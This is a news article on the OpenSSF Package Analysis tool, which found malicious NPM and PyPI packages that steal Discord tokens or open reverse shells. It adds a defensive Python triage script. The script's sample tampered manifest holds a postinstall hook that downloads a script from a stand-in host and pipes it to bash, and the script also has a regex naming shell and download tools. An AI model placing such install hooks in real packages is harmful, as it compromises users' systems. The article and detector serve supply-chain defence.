An analyzer has been released that identified two hundred malicious packages in NPM and PyPI

The OpenSSF (Open Source Security Foundation), formed under the Linux Foundation with the aim of improving the security of open source software, has presented the Open-Source Package Analysis project, which builds a system for checking code packages for malicious behaviour. The project's code is written in Go and distributed under the Apache 2.0 license. An initial scan of the NPM and PyPI repositories with the toolkit found more than two hundred previously unnoticed malicious packages.

Most of the problematic packages detected rely either on names that collide with internal, non-public project dependencies (dependency confusion attack) or on typosquatting (publishing names that resemble well-known libraries), and also run scripts at installation time that fetch external resources. According to the Package Analysis developers, most of the detected problematic packages were probably created by security researchers taking part in bug bounty programs, since the data sent is limited to the user name and system name, and the actions are performed openly, with no attempt to hide the behaviour.

Among the packages showing malicious activity, the following are noted:

  • The discordcmd PyPI package was found sending unusual requests to raw.githubusercontent.com, the Discord API, and ipinfo.io. The package downloaded backdoor code from GitHub and installed it into the directory of the Windows Discord client, after which it started a routine that searched the file system for Discord tokens and sent them to an external Discord server controlled by the attackers.
  • The colorss NPM package, which likewise attempted to send Discord account tokens to an external server.
  • The @roku-web-core/ajax NPM package - during installation it sent data about the system and launched a reverse shell that accepts an external connection and executes commands.
  • The secrevthree PyPI package - launched a reverse shell when one of its modules was imported.
  • The random-vouchercode-generator NPM package - after the library was imported, it sent a request to an external server, which returned a command and the time at which it should be executed.

The work of Package Analysis comes down to analyzing the code of package installation scripts for network connections, file access, and commands being run. In addition, changes in a package's state are tracked, to detect whether a malicious insertion has been added to a previously harmless software release. To follow the appearance of new packages in repositories and changes to packages already published, the Package Feeds toolkit is used, which integrates with the NPM, PyPI, Go, RubyGems, Packagist, NuGet, and Crates repositories.
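As an added illustration (not code from the article or from the Package Analysis project), the following Python triage applies the two ideas above to npm manifests: it flags lifecycle hooks that run automatically at install time and look like they reach the network or spawn a shell, and it diffs two releases of the same manifest so that a newly inserted hook or dependency stands out. The two manifests, the indicator pattern, and the example.invalid URL are constructed for the example.

```python
"""Static triage of npm manifests in the spirit of Package Analysis."""
import json
import re

# Lifecycle hooks that npm runs without user interaction during `npm install`.
INSTALL_HOOKS = ("preinstall", "install", "postinstall")
# Heuristic indicators of network access or shell execution (assumed, not exhaustive).
SUSPICIOUS = re.compile(r"curl|wget|https?://|node\s+-e|bash\s+-c|powershell", re.I)


def install_hooks(manifest: dict) -> dict:
    """Return only the scripts that run automatically at install time."""
    scripts = manifest.get("scripts", {})
    return {k: v for k, v in scripts.items() if k in INSTALL_HOOKS}


def triage(manifest: dict) -> list:
    """Flag install hooks whose command line matches a network/shell indicator."""
    return [f"{k}: {v}" for k, v in install_hooks(manifest).items() if SUSPICIOUS.search(v)]


def diff_releases(old: dict, new: dict) -> dict:
    """Report hooks and dependencies that appear or change between two releases,
    so an insertion into a previously clean package becomes visible."""
    old_hooks, new_hooks = install_hooks(old), install_hooks(new)
    return {
        "added_hooks": sorted(k for k in new_hooks if k not in old_hooks),
        "changed_hooks": sorted(k for k in new_hooks if k in old_hooks and old_hooks[k] != new_hooks[k]),
        "added_deps": sorted(set(new.get("dependencies", {})) - set(old.get("dependencies", {}))),
    }


# Constructed sample manifests (not real packages): a clean 1.0.0 and a tampered 1.0.1.
CLEAN_V1 = json.loads('''{"name": "example-lib", "version": "1.0.0",
  "scripts": {"test": "jest"}, "dependencies": {"lodash": "^4.17.21"}}''')
TAMPERED_V2 = json.loads('''{"name": "example-lib", "version": "1.0.1",
  "scripts": {"test": "jest", "postinstall": "curl -s https://example.invalid/x.sh | bash"},
  "dependencies": {"lodash": "^4.17.21", "example-internal-utils": "^1.0.0"}}''')

if __name__ == "__main__":
    print(triage(TAMPERED_V2))
    print(diff_releases(CLEAN_V1, TAMPERED_V2))
```

Static matching on hook text is only a first filter; Package Analysis complements it with dynamic tracing in an isolated environment, which catches behaviour that is hidden in downloaded code rather than in the manifest.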

Package Analysis consists of three main components that can be used together or separately:

  • A scheduler that launches package analysis jobs based on data from Package Feeds.
  • An analyzer that downloads the package and examines its behaviour using static analysis and dynamic tracing. The check is performed in an isolated environment.
  • A loader that places the scanner's results in BigQuery storage.

Source: opennet.ru
